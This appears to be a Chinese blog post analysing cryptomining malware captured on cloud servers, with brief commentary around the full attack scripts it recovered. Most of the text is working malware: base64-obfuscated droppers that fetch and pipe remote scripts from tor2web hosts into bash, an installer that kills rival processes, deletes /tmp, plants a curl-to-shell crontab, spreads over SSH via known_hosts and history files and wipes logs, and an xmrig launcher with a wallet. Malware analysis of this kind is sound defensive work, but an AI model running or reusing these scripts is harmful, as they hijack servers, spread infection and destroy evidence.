挖矿病毒入侵-分析总结

…衆ロ難τιáo~ 提交于 2019-12-05 07:57:10

  最近,托管云平台出现大量的挖矿病毒;没有安全意识的小伙伴们就只能乖乖交智商睡了;

  抓了好几次,终于反过来抓到入侵脚本;在此做下简单的分析,希望能给大伙一些小小的灵感;

##一个朴实无华的脚本,base64 编码,一脸懵逼;要不是从 /proc/PID 找到线索,还真得被毒打一顿;

#!/bin/bash
exec &>/dev/null
sleep $((RANDOM % 600))
{echo,ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KKHdnZXQgLXQxIC1UMTgwIC1xVS0gLU8tIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgcmFwaWQ3Y3BmcW53eG9kby50b3Iyd2ViLmlvL2Nyb24uc2ggfHwgY3VybCAtbTE4MCAtZnNTTGtBLSByYXBpZDdjcGZxbnd4b2RvLnRvcjJ3ZWIuaW8vY3Jvbi5zaCB8fCB3Z2V0IC10MSAtVDE4MCAtcVUtIC1PLSAtLW5vLWNoZWNrLWNlcnRpZmljYXRlIHJhcGlkN2NwZnFud3hvZG8uZDJ3ZWIub3JnL2Nyb24uc2ggfHwgY3VybCAtbTE4MCAtZnNTTGtBLSByYXBpZDdjcGZxbnd4b2RvLmQyd2ViLm9yZy9jcm9uLnNoIHx8IHdnZXQgLXQxIC1UMTgwIC1xVS0gLU8tIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgcmFwaWQ3Y3BmcW53eG9kby5vbmlvbi5tbi9jcm9uLnNoIHx8IGN1cmwgLW0xODAgLWZzU0xrQS0gcmFwaWQ3Y3BmcW53eG9kby5vbmlvbi5tbi9jcm9uLnNoIHx8IHdnZXQgLXQxIC1UMTgwIC1xVS0gLU8tIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgcmFwaWQ3Y3BmcW53eG9kby5vbmlvbi50by9jcm9uLnNoIHx8IGN1cmwgLW0xODAgLWZzU0xrQS0gcmFwaWQ3Y3BmcW53eG9kby5vbmlvbi50by9jcm9uLnNoIHx8IHdnZXQgLXQxIC1UMTgwIC1xVS0gLU8tIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgcmFwaWQ3Y3BmcW53eG9kby5vbmlvbi5pbi5uZXQvY3Jvbi5zaCB8fCBjdXJsIC1tMTgwIC1mc1NMa0EtIHJhcGlkN2NwZnFud3hvZG8ub25pb24uaW4ubmV0L2Nyb24uc2gpfGJhc2gK}|{base64,-d}|bash

##解密base64 发现;哟哟哟,这脚本很有想法;

(到此处,跟运维同事起了争议;一个认为写域名请求的是傻逼,一个host域名绑定解析就GG了,写死IP才读;另一个认为,写死IP,防火墙直接过滤IP,马上GG ---- 薛定谔之运维工程师)

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
(wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.tor2web.io/cron.sh || curl -m180 -fsSLkA- rapid7cpfqnwxodo.tor2web.io/cron.sh || wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.d2web.org/cron.sh || curl -m180 -fsSLkA- rapid7cpfqnwxodo.d2web.org/cron.sh || wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.onion.mn/cron.sh || curl -m180 -fsSLkA- rapid7cpfqnwxodo.onion.mn/cron.sh || wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.onion.to/cron.sh || curl -m180 -fsSLkA- rapid7cpfqnwxodo.onion.to/cron.sh || wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.onion.in.net/cron.sh || curl -m180 -fsSLkA- rapid7cpfqnwxodo.onion.in.net/cron.sh)|bash

##继续顺藤摸瓜,请求 rapid7cpfqnwxodo.tor2web.io/cron.sh 网址,拿到下一步操作脚本;又是顿虎虎的加密;

[root@hdp-data tmp]# wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.tor2web.io/cron.sh
${*,,}${*^}$BASH${*//m=qNfV1}${!*} <<< "$("${@//G1-s}"''\p${*/MWRqC/$J%f}r'i'$'\156\u0074f' "ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCngoKSB7Cng9L3N5c3RlbWQtbG9naW4Kej0uLyQoY2F0IC9kZXYvdXJhbmRvbSB8IHRyIC1jZCBbOmFsbnVtOl18aGVhZCAtYyA2KQp3Z2V0IC10MSAtVDE4MCAtcVUtIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgJDEkeCAtTyR6IHx8IGN1cmwgLW0xODAgLWZzU0xrQS0gJDEkeCAtbyR6CmNobW9kICt4ICR6OyR6O3JtIC1mICR6Cn0KY2QgL3RtcAp0b3VjaCAvZGV2L3NobS9hc2RmICYmIGNkIC9kZXYvc2htLwp0b3VjaCAvdmFyL3RtcC9hc2RmICYmIGNkIC92YXIvdG1wLwp0b3VjaCAvdXNyL2Jpbi9hc2RmICYmIGNkIC91c3IvYmluLwp0b3VjaCAvZGF0YS9jb25zdWwvYXNkZiAmJiBjZCAvZGF0YS9jb25zdWwvCnRvdWNoIC9vcHQvY29uc3VsLWRhdGEvYXNkZiAmJiBjZCAvb3B0L2NvbnN1bC1kYXRhLwpybSAtZiAvKi8qL2FzZGYKZm9yIGggaW4gYXB0Z2V0Z3hxczNzZWNkYS50b3Iyd2ViLmlvIGFwdGdldGd4cXMzc2VjZGEub25pb24udG8gYXB0Z2V0Z3hxczNzZWNkYS5kMndlYi5vcmcgYXB0Z2V0Z3hxczNzZWNkYS5vbmlvbi5pbi5uZXQgYXB0Z2V0Z3hxczNzZWNkYS50b3Iyd2ViLnN1CmRvCmlmICEgcHMgLXAgJChjYXQgL3RtcC8uWDFNLXVuaXgpOyB0aGVuCnggJGgKZWxzZQpicmVhawpmaQpkb25lCg=="${@##*eL6%W#K}"${@%%KPM5Ry}"|${*/&0%@N/b>\{&S}b"a"${*/Tu#P\[Z/$ufX\)}se$[((${@%6wk^+}-4"#"20+19#b)+2#11)]4 -d"${@//C#Fr\[A-J}"${*})"${*//K>#,w\"7L/kXKsVG}${*#b0l<}

##继续解密操作,渐渐的好像发现的入侵代码了;只能说,这代码写得跟鬼一样,不懂shell 还真被忽悠住了,咱继续;

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

x() {
x=/systemd-login
z=./$(cat /dev/urandom | tr -cd [:alnum:]|head -c 6)
wget -t1 -T180 -qU- --no-check-certificate $1$x -O$z || curl -m180 -fsSLkA- $1$x -o$z
chmod +x $z;$z;rm -f $z
}
cd /tmp
touch /dev/shm/asdf && cd /dev/shm/
touch /var/tmp/asdf && cd /var/tmp/
touch /usr/bin/asdf && cd /usr/bin/
touch /data/consul/asdf && cd /data/consul/
touch /opt/consul-data/asdf && cd /opt/consul-data/
rm -f /*/*/asdf
for h in aptgetgxqs3secda.tor2web.io aptgetgxqs3secda.onion.to aptgetgxqs3secda.d2web.org aptgetgxqs3secda.onion.in.net aptgetgxqs3secda.tor2web.su
do
if ! ps -p $(cat /tmp/.X1M-unix); then
x $h
else
break
fi
done

## 一顿for 循环的实际目的,拿到个hhww123 的一个二进制执行文件;

##wget命令拿不到就用curl 命令wget -t1 -T180 -qU- --no-check-certificate  aptgetgxqs3secda.tor2web.io/systemd-login  -O hhww123  ||curl -m180 -fsSLkA-  aptgetgxqs3secda.tor2web.io/systemd-login  -O hhww123##最后一个操作:授可执行权限;执行;删除掉执行文件; chmod +x hhww123; hhww123;rm -f hhww123

##至此完美的种下了挖矿病毒;

大伙看到这里,会发现,原来入侵如此简单;可能由于网络安全法等原因,这入侵除了不可反编译看源码的hhww123 二进制文件以外;并没有其他恶意的操作;

接下来给大伙看下些恶意满满的入侵代码;

演示案例①

##这是我第一次看到这么有礼貌的入侵,绅士得让我心中不断MMP;要不是看到一堆rm -rf 和 kill -9 的恶意操作,我差点就信了;

#!/bin/sh

#Goal:
# The goal of this campaign is as follows;
#       - To keep the internet safe.
#       - To keep them hackers from causing real damage to organizations.
#       - We know you feel We are a potential threat, well We ain't.
#       - We want to show how tiny vulns could lead to total disasters.
#       - We know you feel We are Hypocrite's, because we mine. Well if we don't how the hell we gonna let you know we are in.
#       - Please We plead to every one out there don't sabotage this campaign (We want to keep the internet safe).
#       - Sometimes you gotta break the rules to make them.
#
#Disclaimer:
#1) We only Wanna Mine.
#2) We don't want your data, or anything or even a ransom.
#3) Please if you find this code, don't post about it.
#4) We make your security better by breaking it.
#
#Contact:
#1) If your server gets infected:
#       - We will provide cleanup script.
#       - We will share source of entry into your servers and patch (surely).
#       - Please if you contacting, please send your affected server's ip and services your run on the server.
#       - lets talk via email at: internetrapist@rape.lol
#2) If you want to partner with us ?.
#       - Shoot us an email ;).

URL=http://p.6465737472756374696f6e.icu:8080/p
INSTALL_DIR=/var/tmp/.systemd-private-c15c0d5284bd838c15fd0d6c5c2b50bb-systemd-resolved.service-xCkB12/vje9c1vlq/bk20vm2o/pavmofp3
MINER_PID_FILE="$INSTALL_DIR/mpid"
GUARD_FILE="$INSTALL_DIR/spid"
PROC_HANDLER_PID_FILE="$INSTALL_DIR/ppid"
MD5_PROC=2b51d09d8eafb765606ced3b43453c9b
MD5_MINER=ae0f778496c2f1056da3437c7dd2e853
MINER_NAME=bioset
PROC_HANDLER_NAME=proc_1
check_arg=$1

bot_kill() {
    ps aux | grep -i "systemd-0" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "vmstat1" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "vmstat0" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "jenkins-0" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "rpciod0" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "kjournald" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "flush-199" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "kblockd0" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "hwlh3wlh44lh" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "Circle_MI" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "get.bi-chi.com" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "hashvault.pro" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "nanopool.org" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "bioset-199" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "kauditd0" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "/usr/bin/.sshd" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "/usr/bin/bsd-port" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "xmr" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "xig" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "ddgs" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "watchdog_0" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -e '0-9a-f\{32\}' | awk '{print $2}' | xargs  kill -9
    ps aux | grep -e '0-9a-f\{33\}' | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "tmp00" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -e '0-9a-f\{16\}' | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "khugepaged" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "qW3xT" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "wnTKYg" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "t00ls.ru" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "sustes" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "thisxxs" | awk '{print $2}' | xargs  kill -9
    netstat -antp | grep ":14444" | awk '{print $7}' | cut -d "/" -f 1 | xargs kill -9
    netstat -antp | grep ":3333" | awk '{print $7}' | cut -d "/" -f 1 | xargs kill -9
    netstat -antp | grep ":4444" | awk '{print $7}' | cut -d "/" -f 1 | xargs kill -9
    netstat -antp | grep ":5555" | awk '{print $7}' | cut -d "/" -f 1 | xargs kill -9
    netstat -antp | grep ":7777" | awk '{print $7}' | cut -d "/" -f 1 | xargs kill -9
    ps aux | grep -i "hashfish" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i -w "./kworker" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "kworkerds" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "/tmp/devtool" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "systemctI" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "sustse" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "axgt" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "sustse" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "6Tx3Wq" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "dblaunchs" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "migrations" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "kerberods" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "httpdz" | awk '{print $2}' | xargs  kill -9
    ps aux | grep -i "qgcd" | awk '{print $2}' | xargs  kill -9
    kill -9 "$(cat /tmp/.X11unix)"
    kill -9 "$(cat /tmp/.XImunix)"
    kill -9 "$(cat /tmp/.lsdpid)"
    # pkill -f "/bin/bash"
    # ps aux|grep -v grep|grep -v "/bin/sh"|grep -v "bash"|awk '{if($3>=50.0) print $2}'|xargs kill -9
}

bash_fake_name() {
    nohup bash -c "( exec -a '/bin/bash' /bin/bash ) < $1" >/dev/null 2>&1 &
    sleep 1s
    pkill -f "$PROC_HANDLER_NAME"
    sleep 3s
}

exe_fake_name() {
    nohup bash -c "exec -a '/sbin/init' $1" >/dev/null 2>&1 & echo $! > $MINER_PID_FILE
}

run_procs() {
    if [ -w "$INSTALL_DIR" ];
    then
        chmod +x $INSTALL_DIR/$MINER_NAME
        chmod +x $INSTALL_DIR/$PROC_HANDLER_NAME
        if ! kill -0 "$(cat $MINER_PID_FILE)" > /dev/null
        then
            exe_fake_name "./$MINER_NAME"
        fi
        if ! kill -0 "$(cat $PROC_HANDLER_PID_FILE)" > /dev/null
        then
            if test "$check_arg" != "t"
            then
                bash_fake_name "./$PROC_HANDLER_NAME"
            fi
        fi
    else
        exit 1
    fi
}

getmd5() {
    echo "$(md5sum "$1" | cut -d ' ' -f 1)"
}

install() {
    cd $INSTALL_DIR
    if test "$(getmd5 $MINER_NAME)" != "$MD5_MINER" || test "$(getmd5 $PROC_HANDLER_NAME)" != "$MD5_PROC"
    then
        kill -9 "$(cat $PROC_HANDLER_PID_FILE)"
        kill -9 "$(cat $MINER_PID_FILE)"
        rm -rf /var/tmp
        rm -rf /tmp
        mkdir -p /tmp
        mkdir -p /var/tmp
        chmod 1777 /var/tmp
        chmod 1777 /tmp
        mkdir -p $INSTALL_DIR
        cd $INSTALL_DIR
        sleep 15s
        mkdir -p $INSTALL_DIR
        cd $INSTALL_DIR
        ARCH=$(getconf LONG_BIT)
        if test "$(getmd5 $PROC_HANDLER_NAME)" != "$MD5_PROC"
        then
            (curl -fsSL -m180 "$URL?a=h" -o "$PROC_HANDLER_NAME"||wget -T180 -q "$URL?a=h" -O "$PROC_HANDLER_NAME")
        fi
        if test "$(getmd5 $MINER_NAME)" != "$MD5_MINER"
        then
            if test "${ARCH}x" = "64x"
            then
                (curl -fsSL -m180 "$URL?a=d&ar=64" -o "$MINER_NAME"||wget -T180 -q "$URL?a=d&ar=64" -O "$MINER_NAME")
            else
                (curl -fsSL -m180 "$URL?a=d&ar=86" -o "$MINER_NAME"||wget -T180 -q "$URL?a=d&ar=86" -O "$MINER_NAME")
            fi
        fi
    fi
    run_procs
}

write_cron() {
    crontab -r
    echo "*/10 * * * * (curl -fsSL -m180 \"$URL?a=p&a2=cron\"||wget -q -T180 -O- \"$URL?a=p&a2=cron\")|sh"|crontab -
}

poll() {
    (curl -fsSL -m180 "$URL?a=p"||wget -q -T180 -O- "$URL?a=p")|sh
}

lateral() {
    for h in $(cat /root/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.bash_history /home/*/.bash_history|grep -v "127.0.0.1"|grep -oE "\b(0-9{1,3}\.){3}0-9{1,3}\b"|sort|uniq); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no "$h" '(curl -fsSL -m180 \"$URL?a=p&a2=lat\"||wget -q -T180 -O- \"$URL?a=p&a2=lat\")|sh >/dev/null 2>&1' & done
}

log_clear() {
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cron
    sed -i '/6465737472756374696f6e/d' /var/log/syslog
}

rm -rf /tmp/cron

if ! kill -0 "$(cat $GUARD_FILE)" > /dev/null
then
    echo "$$" > $GUARD_FILE
    bot_kill
    write_cron
    log_clear
    if ! kill -0 "$(cat $MINER_PID_FILE)" > /dev/null || ! kill -0 "$(cat $PROC_HANDLER_PID_FILE)" > /dev/null
    then
        install
    else
        poll
    fi
    lateral
    log_clear
fi
exit 0

###一脸懵逼,我从哪里来,我该往哪里去? 没错,反着扒文件,找到了上面那个脚本的前一步shell操作;

#!/bin/sh

Check_Repeating_Time=3; # in seconds
Max_CPU_Usage='70.0'; #%
INSTALL_DIR=/var/tmp/.systemd-private-c15c0d5284bd838c15fd0d6c5c2b50bb-systemd-resolved.service-xCkB12/vje9c1vlq/bk20vm2o/pavmofp3
MINER_PID_FILE="$INSTALL_DIR/mpid"
PROC_HANDLER_PID_FILE="$INSTALL_DIR/ppid"
GUARD_FILE="$INSTALL_DIR/spid"
POLL_URL=http://p.6465737472756374696f6e.icu:8080/poll

if kill -0 "$(cat $PROC_HANDLER_PID_FILE)" > /dev/null
then
    exit 0
fi

MINER_PID=0

while true 
do
    echo "$$" > $PROC_HANDLER_PID_FILE
    if ! kill -0 "$(cat $MINER_PID_FILE)" > /dev/null && ! kill -0 "$MINER_PID" > /dev/null 
    then
        if ! kill -0 "$(cat $GUARD_FILE)" > /dev/null
        then
            (curl -fsSL -m180 "$POLL_URL"||wget -q -T180 -O- "$POLL_URL")|sh -s t
        fi
    else
        if [ -e "$MINER_PID_FILE" ]
        then
            MINER_PID="$(cat $MINER_PID_FILE)"
        fi
    fi
    ps aux |
    awk '{
        Proc_Name = $11;
        CPU_Usage = $3;
        PID = $2;
        if((CPU_Usage >= '$Max_CPU_Usage' ) && (PID != '$(cat "$MINER_PID_FILE")') && (PID != '$MINER_PID'))
        {
            system ("kill -9 " PID);
        }
    }';
    sleep $Check_Repeating_Time\s;
done;

 

演示案例②

##这个就厉害了,入侵前应该是做了个root 的密码弱口令暴力猜解;

(注:在此之前,曾找到个.pw 的密码字典;不知道哪位大佬的,有足足二三十万的弱口令枚举;root用户使用密码方式似乎岌岌可危;但如果全部用密钥交换登录形式,对核心堡垒机的考验很大;只要入侵成功,仅仅需要 cat  /root/.ssh/known_hosts 拿到主机记录,立马全家一起被端了;)

#!/bin/bash

if [[ $(whoami) != "root" ]]; then
    for tr in $(ps -U $(whoami) | egrep -v "java|ps|sh|egrep|grep|PID" | cut -b1-6); do
        kill -9 $tr || : ;
    done;
fi

threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
hostHash=$(hostname -f | md5sum | cut -c1-8);
echo "${hostHash} - ${threadCount}";

_curl () {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}

rm -rf config.json;

d () {
    curl -L --insecure --connect-timeout 5 --max-time 40 --fail $1 -o $2 2> /dev/null || wget --no-check-certificate --timeout 40 --tries 1 $1 -O $2 2> /dev/null || _curl $1 > $2;
}

#test ! -s trace && \
#    (d http://87.44.19.162/job/Insecure-Jenkins/ws/trace trace || \
#     d http://54.88.236.33/job/Insecure-Jenkins/ws/trace trace)

test ! -s trace && \
    d https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz trace.tgz && \
    tar -zxvf trace.tgz && \
    mv xmrig-2.14.1/xmrig trace && \
    rm -rf xmrig-2.14.1 && \
    rm -rf trace.tgz;

test ! -x trace && chmod +x trace;

k() {
    ./trace \
        --algo cn/double \
        -r 100 \
        -R 100 \
        --keepalive \
        --no-color \
        --donate-level 1 \
        --max-cpu-usage 95 \
        --cpu-priority 3 \
        --print-time 25 \
        --threads ${threadCount:-4} \
        --url $1 \
        --user XCBzxb7igt5YvbwtYCMPkEWRATpzrMYvU2PpTDi89bon7fYnJgYSeRS8EN5LLnPxgkgfsf3k1DZVn1bzccTFBNhpPGbJGGkskmrSg3EGmoSsQH \
        --pass 82b08f53 \
        --keepalive
}

k eu.XCA.cryptopool.space:5555 || k Pool.XCA.CryptoPool.Space:5555

 

总结分析:

       安全只是相对的,没有绝对的安全可言;

  对于上述的挖矿病毒来说,未知其入侵源头的话;

  只能用治标不治本的办法;禁用相关网络组件或避免不可挽回的操作命令被执行;

  例如:wget、curl、rm、kill、echo 等等;

 

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!